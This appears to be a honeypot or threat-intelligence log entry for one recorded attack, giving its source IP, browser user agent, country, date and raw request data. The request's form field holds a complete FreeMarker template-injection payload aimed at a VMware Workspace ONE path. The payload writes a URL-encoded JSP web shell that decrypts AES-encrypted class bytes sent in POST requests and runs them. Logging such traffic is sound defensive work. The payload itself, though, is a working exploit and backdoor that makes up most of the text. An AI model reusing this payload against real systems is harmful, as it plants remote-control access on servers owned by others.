Attack 2bf0b163-042d-4975-8ff2-09ee5ef6bef9
Details
| ID |
2bf0b163-042d-4975-8ff2-09ee5ef6bef9 |
| Attack Type |
elasticsearch |
| IP Address |
75.127.11.24 |
| Username |
|
| Password |
|
| Client Version |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40 |
| Country |
United States |
| Date |
2023-06-04 08:48PM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
"Accept-Encoding": "gzip, deflate"
},
"hostname": "localhost",
"form_data": {
"code": "",
"deviceType": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/T6WJOst.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%250A%2B%2B%2B%2B%2B%2B%2B%2B%253C%2525%2540page%2Bimport%253D%255C%2522java.util.%252A%252Cjavax.crypto.%252A%252Cjavax.crypto.spec.%252A%255C%2522%2525%253E%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%253C%2525%2521%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bclass%2BU%2Bextends%2BClassLoader%257B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2BU%2528ClassLoader%2Bc%2529%2B%257B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bsuper%2528c%2529%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bpublic%2BClass%2Bg%2528byte%2B%255B%255Db%2529%2B%257B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Breturn%2Bsuper.defineClass%2528b%252C0%252Cb.length%2529%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%257D%2525%253E%253C%2525%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bif%2B%2528request.getMethod%2528%2529.equals%2528%255C%2522POST%255C%2522%2529%2529%257B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2BString%2Bk%253D%255C%2522e45e329feb5d925b%255C%2522%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bsession.putValue%2528%255C%2522u%255C%2522%252Ck%2529%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2BCipher%2Bc%253DCipher.getInstance%2528%255C%2522AES%255C%2522%2529%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bc.init%25282%252Cnew%2BSecretKeySpec%2528k.getBytes%2528%2529%252C%255C%2522AES%255C%2522%2529%2529%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bnew%2BU%2528this.getClass%2528%2529.getClassLoader%2528%2529%2529.g%2528c.doFinal%2528new%2Bsun.misc.BASE64Decoder%2528%2529.decodeBuffer%2528request.getReader%2528%2529.readLine%2528%2529%2529%2529%2529.newInstance%2528%2529.equals%2528pageContext%2529%253B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2525%253E%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%253C%2525out.println%2528%255C%2522e8418d1d706cd73548f9f16f1d55ad6e%255C%2522%2529%2B%253B%2525%253E\").getBytes())}"
}
}